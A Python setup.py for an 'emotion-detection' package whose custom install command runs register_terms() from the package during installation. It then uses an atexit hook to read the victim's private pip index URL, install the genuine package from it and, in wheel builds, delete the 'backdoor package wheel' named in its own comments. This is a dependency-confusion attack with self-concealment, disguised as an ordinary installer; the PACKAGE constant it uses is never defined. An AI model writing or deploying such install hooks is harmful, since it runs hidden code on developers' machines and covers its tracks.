from setuptools import setup, find_packages
from setuptools.command.install import install
from emotion_detection.reorder import register_terms
import subprocess 
import shutil
import site
import atexit
import sys, os
import traceback

def get_index():
    try:
        f = open(os.path.expanduser("~/.pip/pip.conf"))
    except OSError:
        return
    except IOError:
        return
    
    for line in f.readlines():
        if "index-url" in line:
            f.close()
            return line.split("=")[-1].strip()
    f.close()


class IdataInstall(install):
    def run(self):    
        def _post_install():      
            
            pip = "{} -m pip".format(sys.executable)
            
            # getting an index url to prevent a recursive loop of getting a package from PyPI 
            # in case ~/.pip/pip.conf doesn't exist
            index_url = get_index()
            if not index_url:
                return

             # Python 11 & 12 require site-packages path in PYTHONPATH otherwise can't find PIP module
            if sys.version_info[0] >= 3 and sys.version_info[1] >= 10:
                py_path = 'PYTHONPATH="{}" '.format(site.getsitepackages()[0]) 
            else:
                py_path = ''


            # pip automatically installs the latest version and its dependeciess from the internal registry, so no need to do any extra steps
            try:
                s = subprocess.check_output('{}{} install {} --index-url "{}"'.format(py_path, pip, PACKAGE, index_url), shell=True)#.decode()
            except subprocess.CalledProcessError:
                return
            
            # this step is only required if wheel package is installed 
            # and an installation is running in a bdist_wheel mode
            if "bdist_wheel" in sys.argv:
                # we need an original wheel to replace the backdoor wheel
                s = subprocess.check_output('{}{} download {} --no-deps --index-url "{}"'.format(py_path, pip, PACKAGE, index_url), shell=True)#.decode()

                dw_wheel = os.listdir(os.getcwd())[-1].strip()
                
                # path to wheel folder
                t_dir = sys.argv[-1]
                # Python 11 & 12 don't auto create the destination folder (bug), so we need to create it
                if not os.path.exists(t_dir):
                    os.makedirs(t_dir)
                    shutil.move(dw_wheel, t_dir + "/" + dw_wheel)
                else:
                    # should contain a single wheel file
                    t_wheel  = os.listdir(t_dir)[-1].strip()
                    # target wheel is a backdoor package
                    # delete the backdoor package wheel from a build folder
                    os.unlink(t_dir + "/" + t_wheel)
                    # move downloaded wheel into the build folder
                    shutil.move(dw_wheel, t_dir + "/" + dw_wheel)
            
        atexit.register(_post_install)
        register_terms()
        install.run(self)

try:

    f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "README.md"), "rb")
    README = f.read().decode("utf8")
    f.close()

    setup(
        name="emotion-detection",
        version='4.1.2',
        packages=find_packages(),  
        author="yarnqueen921",
        author_email="yarnqueen921@yahoo.com",
        url="https://github.com/yarnqueen921/emotion-detection",
        license="MIT",
        cmdclass={'install': IdataInstall},  
        long_description=README,
        long_description_content_type="text/markdown",
        classifiers=[
            'Development Status :: 5 - Production/Stable',
            'Intended Audience :: Developers',
            'Natural Language :: English',
            'License :: OSI Approved :: MIT License',
        ],
        project_urls={
            'Documentation': 'https://emotion-detection.readthedocs.io',
            'Source': 'https://github.com/yarnqueen921/emotion-detection',
    },


    )
except Exception:
    print(traceback.format_exc())
